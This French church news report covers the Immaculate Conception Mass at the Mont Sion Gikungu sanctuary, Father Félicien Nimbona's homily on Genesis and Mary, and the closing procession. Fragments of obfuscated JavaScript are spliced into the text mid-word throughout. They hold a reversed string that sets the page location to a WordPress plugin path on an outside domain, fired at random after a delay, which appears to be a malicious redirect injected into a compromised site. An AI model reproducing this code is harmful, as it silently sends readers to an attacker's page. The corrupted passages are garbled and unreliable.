Le Sanctuaire Marial Mont Sion Gikungu vient de célébrer avec toute l’Eglise entière la solennité de l’Immaculée Conception ce samedi le 8 décembre dans une Messe qui a débuté 11heures.
Il est 10heures et demie, l’Eglise de la sainte trinité de Mont Sion Gikungu est presque pleine de centaines de fidèles. On a commencé l’animation suivie d’une louange. A 11h précise, c’est la messe dite par le Père Félicien NIMBONA. En l’introduisant, il a invité tout un chacun de se sentir dans la maison du Père et il a rappelé que nous sommes présents pour remercier le Seigneur qui nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’Immaculée Conception.
Dans son homélie, il est revenu sur la première lecture du livre de la Genèse au chapitre 3,9-15 : « Comme nos parents Adam et Eve, chacun a devant lui des embuscades et la première réaction après le péché c’est la honte. L’homme a fui mais Dieu lui-même est venu le chercher. Qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and on retourne vers le Seigneur a dit le Père Félicien, il n’y rien d’étonnant parce que ce ne sont pas nos forces c’est plutôt par la puissance et l’amour de Dieu.» Dieu demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande alors, où es-tu?
« Que chacun se demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande : comment sont mes comportements ? Mes chemins ? Mes pensées ? Mes travaux ? Qu’est ce qui m’éloigne de Dieu ? Qu’est ce qui me fait fuir ? » a suggéré le célébrant.
Il a continué en disant que la connaissance de soi est une chose très pertinente et que nous sommes appelés à avouer nos fautes : « Adam avait avoué qu’il est fautif et le Seigneur a sanctionné mais il promit une grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande chose : je vais envoyer une femme, Eve nouvelle »
Nulle n’est comme Marie a martelé le Père. Et sur la question de savoir comment Marie est Immaculée, le célébrant répond : « le Pape Pie IX a proclamé solennellement que Marie est Immaculée Conception le 8 décembre 1854.
Comment l’Eglise l’explique ?
Marie a engendré le Sauveur et la parole de Dieu dit que tout le monde est pécheur sauf Marie. (Romains 3,23).Pourquoi Marie ? Selon le Père Félicien, toutes les fêtes de Marie trouvent origine en cela qu’elle est la mère du sauveur. Elle a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné sang et chair à Jésus et c’est ce sang du christ qui va purifier le monde. Dieu avait alors préparé depuis longtemps cette femme et l’avait protégé du péché originel.
Quatre ans après, c’est-à-dire en 1858, Marie est apparue à Bernadette de Lourdes et elle-même s’est proclamée Immaculée Conception. Comme ça, elle vient de confirmer la déclaration de l’Eglise. Il a conclu en rappelant que nous avons une Maman : « Mes amis, nous avons une Maman, ça ne sert à rien alors de se comporter comme des orphelins parce que le serviteur de Marie ne périra jamais »
Signalons qu’après l’action de grâce a poursuivi une procession vers le Sanctuaire. Après quelques litanies, le célébrant a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la bénédiction finale.
Brigitte IRAKOZE